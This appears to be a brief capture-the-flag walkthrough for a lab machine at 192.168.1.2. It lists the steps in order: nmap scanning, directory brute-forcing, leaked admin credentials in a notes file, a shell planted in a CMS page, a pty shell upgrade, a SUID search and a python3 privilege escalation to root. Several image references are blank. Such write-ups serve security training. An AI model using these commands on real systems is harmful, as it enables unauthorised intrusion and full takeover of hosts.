Start by scanning the target with nmap –A –T4 –p- 192.168.1.2 –vv
While running dirb i visited port 8080 and i found the page has a picture of note and when viewing the source we can see this:
So visiting 192.168.1.2:8080/mynotes.txt when can find:
User admin
Password adminadmin2
Now as i said i was running dirb and gave us some results, one of them is a page to log http://192.168.1.2/backend in with these credentials:
And we got in:
Now the CMS is php restricted, means we can’t upload a php pr php5 files, but we can upload a simple shell command on the site webpage, navigate to http://192.168.1.2/backend/cms and add a page and then we write a function inside it the shell:
And as you can see we got in, then we escape the shell by python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ and then bash –p
Now using find / -perm –u=s –type f 2>/dev/null we found we can use python3 to priv escalate:
All we have to do is write a command and we are root:
python3 -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’
